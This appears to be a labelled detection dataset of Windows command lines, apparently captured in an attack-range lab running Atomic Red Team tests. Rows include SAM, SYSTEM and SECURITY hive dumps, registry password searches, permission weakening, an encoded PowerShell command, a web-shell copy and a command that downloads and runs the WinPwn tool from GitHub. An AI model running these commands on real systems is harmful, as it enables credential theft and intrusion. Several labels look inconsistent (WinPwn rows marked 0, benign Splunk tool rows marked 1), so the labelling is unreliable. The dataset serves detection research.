text
stringlengths 65
3.78k
| label
int64 0
1
|
---|---|
ar-win-2.attackrange.local AR-WIN-2$ C:\Windows\System32\SIHClient.exe conhost.exe \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | 0 |
ar-win-2.attackrange.local AR-WIN-2$ C:\Windows\System32\lpremove.exe mcbuilder.exe C:\Windows\system32\mcbuilder.exe | 0 |
cmd.exe C:\Windows\System32\cmd.exe /c "icacls.exe %temp%\T1222.001_cacls /grant Everyone:F" powershell.exe ar-win-dc.attackrange.local | 1 |
ar-win-2.attackrange.local AR-WIN-2$ C:\Windows\System32\sc.exe conhost.exe \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | 0 |
ar-win-2.attackrange.local Administrator "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Administrator\AppData\Local\Temp\denmf3pb\denmf3pb.cmdline" cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\ADMINI~1\AppData\Local\Temp\RESB5EF.tmp" "c:\Users\Administrator\AppData\Local\Temp\denmf3pb\CSCFA7AB053470C4C15987ED07EDD6ACF16.TMP" | 0 |
cmd.exe C:\Windows\System32\cmd.exe /c "mkdir %temp%\T1222.001_attrib_2 >nul 2>&1 & echo T1222.001_attrib1 >> %temp%\T1222.001_attrib_2\T1222.001_attrib1.txt & echo T1222.001_attrib2 >> %temp%\T1222.001_attrib_2\T1222.001_attrib2.txt & attrib.exe +h %temp%\T1222.001_attrib_2\T1222.001_attrib1.txt & attrib.exe +h %temp%\T1222.001_attrib_2\T1222.001_attrib2.txt" powershell.exe ar-win-dc.attackrange.local | 1 |
cmd.exe "cmd.exe" /c "icacls C:\Users\Public\* /save %%temp%%\T1222.001-folder-perms-backup.txt /t /q >nul 2>&1" powershell.exe ar-win-2.attackrange.local | 1 |
reg.exe reg save HKLM\security C:\Users\ADMINI~1\AppData\Local\Temp\security "cmd.exe" /c "reg save HKLM\sam %temp%\sam & reg save HKLM\system %temp%\system & reg save HKLM\security %temp%\security" ar-win-dc.attackrange.local Administrator | 1 |
ar-win-2.attackrange.local Administrator "powershell.exe" & {} csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Administrator\AppData\Local\Temp\50awgclv\50awgclv.cmdline" | 0 |
cmd.exe C:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBhAFEAQgBtAEEAQwBBAEEASwBBAEEAawBBAEYAQQBBAFUAdwBCAFcAQQBHAFUAQQBjAGcAQgB6AEEARwBrAEEAYgB3AEIAdQBBAEYAUQBBAFkAUQBCAGkAQQBHAHcAQQBaAFEAQQB1AEEARgBBAEEAVQB3AEIAVwBBAEcAVQBBAGMAZwBCAHoAQQBHAGsAQQBiAHcAQgB1AEEAQwBBAEEATABRAEIAcwBBAEgAUQBBAEkAQQBCAGIAQQBGAFkAQQBaAFEAQgB5AEEASABNAEEAYQBRAEIAdgBBAEcANABBAFgAUQBBAGkAQQBEAE0AQQBMAGcAQQB3AEEAQwBJAEEASwBRAEEAZwBBAEgAcwBBAEMAZwBBAG4AQQBIAHMAQQBJAGcAQgBtAEEARwBFAEEAYQBRAEIAcwBBAEcAVQBBAFoAQQBBAGkAQQBEAG8AQQBkAEEAQgB5AEEASABVAEEAWgBRAEEAcwBBAEMASQBBAGIAUQBCAHoAQQBHAGMAQQBJAGcAQQA2AEEAQwBJAEEAUQBRAEIAdQBBAEgATQBBAGEAUQBCAGkAQQBHAHcAQQBaAFEAQQBnAEEASABJAEEAWgBRAEIAeABBAEgAVQBBAGEAUQBCAHkAQQBHAFUAQQBjAHcAQQBnAEEARgBBAEEAYgB3AEIAMwBBAEcAVQBBAGMAZwBCAFQAQQBHAGcAQQBaAFEAQgBzAEEARwB3AEEASQBBAEIAMgBBAEQATQBBAEwAZwBBAHcAQQBDAEEAQQBiAHcAQgB5AEEAQwBBAEEAYgBnAEIAbABBAEgAYwBBAFoAUQBCAHkAQQBDAEkAQQBmAFEAQQBuAEEAQQBvAEEAWgBRAEIANABBAEcAawBBAGQAQQBBAGcAQQBEAEUAQQBDAGcAQgA5AEEAQQBvAEEASgBBAEIAbABBAEgAZwBBAFoAUQBCAGoAQQBGADgAQQBkAHcAQgB5AEEARwBFAEEAYwBBAEIAdwBBAEcAVQBBAGMAZwBCAGYAQQBIAE0AQQBkAEEAQgB5AEEAQwBBAEEAUABRAEEAZwBBAEMAUQBBAGEAUQBCAHUAQQBIAEEAQQBkAFEAQgAwAEEAQwBBAEEAZgBBAEEAZwBBAEUAOABBAGQAUQBCADAAQQBDADAAQQBVAHcAQgAwAEEASABJAEEAYQBRAEIAdQBBAEcAYwBBAEMAZwBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQQBnAEEARAAwAEEASQBBAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBGADgAQQBjAHcAQgAwAEEASABJAEEATABnAEIAVABBAEgAQQBBAGIAQQBCAHAAQQBIAFEAQQBLAEEAQgBBAEEAQwBnAEEASQBnAEIAZwBBAEQAQQBBAFkA winrshost.exe ar-win-2.attackrange.local | 1 |
net1.exe unknown C:\Windows\system32\net1 stop spooler net.exe C:\Windows\System32\net.exe ar-win-2.attackrange.local Administrator | 1 |
cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\WinHostMon.cmd" --scheme" splunkd.exe ar-win-dc.attackrange.local | 1 |
reg.exe reg.exe reg query HKCU /f password /t REG_SZ /s cmd.exe "cmd.exe" /c "reg query HKLM /f password /t REG_SZ /s & reg query HKCU /f password /t REG_SZ /s" ar-win-2.attackrange.local Administrator | 1 |
reg.exe unknown C:\Windows\System32\reg.exe query HKCU\Software\SimonTatham\PuTTY\Sessions /t REG_SZ /s cmd.exe C:\Windows\System32\cmd.exe ar-win-2.attackrange.local Administrator | 1 |
ar-win-2.attackrange.local Administrator C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\ADMINI~1\AppData\Local\Temp\RES8EBF.tmp" "c:\Users\Administrator\AppData\Local\Temp\CSC990F7FEBC7414CA9A3433024496A9E7B.TMP" | 0 |
reg.exe reg save HKLM\sam C:\Users\ADMINI~1\AppData\Local\Temp\sam "cmd.exe" /c "reg save HKLM\sam %temp%\sam & reg save HKLM\system %temp%\system & reg save HKLM\security %temp%\security" ar-win-2.attackrange.local Administrator | 1 |
ar-win-2.attackrange.local AR-WIN-2$ C:\Windows\System32\dstokenclean.exe conhost.exe \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | 0 |
ar-win-2.attackrange.local AR-WIN-2$ C:\Windows\System32\services.exe sysmon64.exe C:\Windows\sysmon64.exe | 0 |
ar-win-2.attackrange.local Administrator C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe cmd.exe C:\Windows\System32\cmd.exe /c "for /L %a in (1,1,10) do @(del %temp%\SAMvss%a >nul 2>&1)" | 0 |
attrib.exe C:\Windows\System32\attrib.exe +h C:\Users\ADMINI~1\AppData\Local\Temp\T1222.001_attrib_2\T1222.001_attrib1.txt C:\Windows\System32\attrib.exe +h C:\Users\ADMINI~1\AppData\Local\Temp\T1222.001_attrib_2\T1222.001_attrib2.txt C:\Windows\System32\cmd.exe ar-win-dc.attackrange.local Administrator | 1 |
ar-win-2.attackrange.local Administrator "powershell.exe" & {$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
samfile -consoleoutput -noninteractive} csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Administrator\AppData\Local\Temp\3d31m1j0\3d31m1j0.cmdline" | 0 |
ar-win-2.attackrange.local AR-WIN-2$ C:\Windows\System32\cmd.exe conhost.exe \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | 0 |
cmd.exe "C:\Windows\system32\cmd.exe" /c "if not exist "%%programfiles%%/WinRAR/Rar.exe" (exit /b 1)" powershell.exe ar-win-2.attackrange.local | 1 |
net.exe net.exe net.exe stop spooler cmd.exe "cmd.exe" /c "net.exe stop spooler" ar-win-2.attackrange.local Administrator | 1 |
cmd.exe "cmd.exe" /c "mkdir %%temp%%\T1222.001_attrib_2 >nul 2>&1 & echo T1222.001_attrib1 >> %%temp%%\T1222.001_attrib_2\T1222.001_attrib1.txt & echo T1222.001_attrib2 >> %%temp%%\T1222.001_attrib_2\T1222.001_attrib2.txt & attrib.exe +h %%temp%%\T1222.001_attrib_2\T1222.001_attrib1.txt & attrib.exe +h %%temp%%\T1222.001_attrib_2\T1222.001_attrib2.txt" powershell.exe ar-win-2.attackrange.local | 1 |
cmd.exe "cmd.exe" /c "attrib.exe -r %%temp%%\T1222.001_attrib\*.* /s" powershell.exe ar-win-dc.attackrange.local | 1 |
cmd.exe C:\Windows\system32\cmd.exe /c btool server list replication_port --no-log splunk.exe ar-win-2.attackrange.local | 1 |
cmd.exe C:\Windows\System32\cmd.exe /c "icacls.exe %temp%\T1222.001_cacls /grant Everyone:F" powershell.exe ar-win-2.attackrange.local | 1 |
ar-win-2.attackrange.local AR-WIN-2$ C:\Windows\System32\svchost.exe wermgr.exe "C:\Windows\system32\wermgr.exe" -upload | 0 |
cmd.exe C:\Windows\System32\cmd.exe /c "net.exe start spooler >nul 2>&1" powershell.exe ar-win-2.attackrange.local | 1 |
cmd.exe "C:\Windows\system32\cmd.exe" /c C:\AtomicRedTeam\atomics\..\ExternalPayloads\nircmd.exe win child class Shell_TrayWnd show class TrayClockWClass -erroraction silentlycontinue powershell.exe ar-win-dc.attackrange.local | 1 |
cmd.exe C:\Windows\System32\cmd.exe /c "xcopy /I /Y C:\AtomicRedTeam\atomics\T1505.003\src C:\inetpub\wwwroot" powershell.exe ar-win-dc.attackrange.local | 1 |
ar-win-2.attackrange.local AR-WIN-2$ C:\Windows\System32\services.exe svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted | 0 |
ar-win-2.attackrange.local Administrator "powershell.exe" & {$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
samfile -consoleoutput -noninteractive} csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Administrator\AppData\Local\Temp\denmf3pb\denmf3pb.cmdline" | 0 |
reg.exe C:\Windows\System32\reg.exe save HKLM\sam C:\Users\ADMINI~1\AppData\Local\Temp\sam C:\Windows\System32\cmd.exe ar-win-dc.attackrange.local Administrator | 1 |
cmd.exe "C:\Windows\system32\cmd.exe" /c "for /l %%x in (1,1,75) do start wordpad.exe /p C:\AtomicRedTeam\atomics\..\ExternalPayloads\T1059_003note.txt" powershell.exe ar-win-dc.attackrange.local | 1 |